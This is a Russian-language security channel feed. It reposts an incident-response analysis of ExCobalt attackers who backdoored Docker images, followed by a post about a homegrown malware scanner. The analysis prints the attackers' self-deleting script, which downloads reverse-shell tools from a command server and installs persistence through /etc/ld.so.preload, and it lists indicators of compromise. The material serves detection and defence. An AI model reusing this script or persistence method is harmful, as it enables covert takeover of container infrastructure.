SecuriXy.kz

(Ex)Cobalt в контейнере 🛂

В ходе реагирования на компьютерный инцидент команда PT ESC IR установила факт закрепления злоумышленников в Docker-контейнерах.

Анализируя дамп с узла, на котором установлен Docker, мы обнаружили образцы ВПО в директории /var/lib/docker/overlay2/[a-z0-9]+/diff/usr/bin/.+. Она содержит слои контейнеров:

/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/processes — Reverse SSH
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/checks — ExСobalt Reverse SSH

Стало понятно, что мы обнаружили заражение внутри одного из контейнеров. Для дополнительного анализа мы получили Docker-образ, на основе которого создавался контейнер. Пример команды:

docker save myimage:latest | gzip > myimage_latest.tar.gz

Анализ истории показал, что атакующим удалось модифицировать образ путем выполнения двух команд: COPY, которая копировала файл update в образ, и команды запуска скрипта /bin/bash /update. Затем модифицированный образ был загружен в локальный Docker Registry.

{
"created": "2023-08-11T01:13:12",
"created_by": "/bin/sh -c #(nop) COPY file:[REDACTED] in / "
},
{
"created": "2023-08-11T01:13:18",
"created_by": "/bin/sh -c /bin/bash /update"
}

Далее в одном из слоев образа мы обнаружили самоудаляющийся sh-скрипт update:

#!/bin/bash
rm -- $0
apt update
apt install wget curl -y
apt-get clean autoclean
apt-get autoremove --yes
wget -q [REDACTED]:8000/bin/rev_sh_dns -O /usr/bin/checks
wget -q [REDACTED]:8000/bin/rev_ssh -O /usr/bin/processes
wget -q [REDACTED]:8000/lib/libssoc.so.3h -O /usr/lib/x86_64-linux-gnu/libssoc.so
chmod +x /usr/bin/checks /usr/bin/processes /usr/lib/x86_64-linux-gnu/libssoc.so
echo "/usr/lib/x86_64-linux-gnu/libssoc.so" >> /etc/ld.so.preload

Скрипт подгружал образцы ВПО с управляющего сервера в образ, а также для закрепления прописывал их в /etc/ld.so.preload.

/usr/lib/x86_64-linux-gnu/libssoc.so — образец ExСobalt Launcher запускает процессы /usr/bin/checks и /usr/bin/processes.

🧐 Расследование показало, что атакующие модифицировали Docker-образ создаваемых контейнеров и таким образом не только закрепились в скомпрометированной инфраструктуре, но и получили контроль над вновь создаваемыми контейнерами.

Чтобы предотвратить подобные компьютерные инциденты, рекомендуется проверять ОС, а также функционирующие на устройствах Docker-контейнеры и конфигурационные файлы / скрипты, участвующие в сборке.

IoCs:

leo.rpm-bin.link
mirror.dpkg-source.info

e49b72e58253f4f58f9c745757eb3ab0
3bd5560b50c751c91056bfe654f9bc70
ef587305a462161682f74d0cad139caa

#ir #ioc #malware
@ptescalator

Если посмотреть в VirusTotal Premium 💎👑 на хэшики из публикации Sekoia про атаку на МИД, то можно увидеть, что вредоносные документы были загружены из Казахстана. 👀 Очевидно, что ИБ-компании создают ханты и Yara правила на сэмплы на сервисе VT, поэтому обнаружение нового кластера APT28 🥸 стало делом времени. Прискорбным фактом тут является то, что мы сами сливаем данные в облака, а потом видим хайповые публикации с политическим подтекстом. 📣

Всё это повышает актуальность создания собственных средств, инструментов и сервисов для кибербезопасности. 🔼 Примером такого сервиса является malware.kz. По правде говоря, он создан "на коленке", и еле дышит. 📎 Но, я и не задавался целью создать замену VirusTotal, для одиночки это не под силу - слишком много ресурсов требуется. Этот проект - лишь отработка концепции такого сервиса, задел на будущее, так сказать. 🔜

Но отойдем от философских размышлений. ✨ Вернул на malware.kz проверку загружаемых файлов при помощи ClamAV и дополнил его сканированием по Yara-правилам. Это позволит пользователю хоть как-то идентифицировать и классификацировать малварь. 🎮 Кстати, Yara правила взял с проекта Yara Forge - в этом проекте собраны правила из популярных фидов. Всё в одном файле и сразу готово к интеграции - бери и пользуйся. ⚙️🛡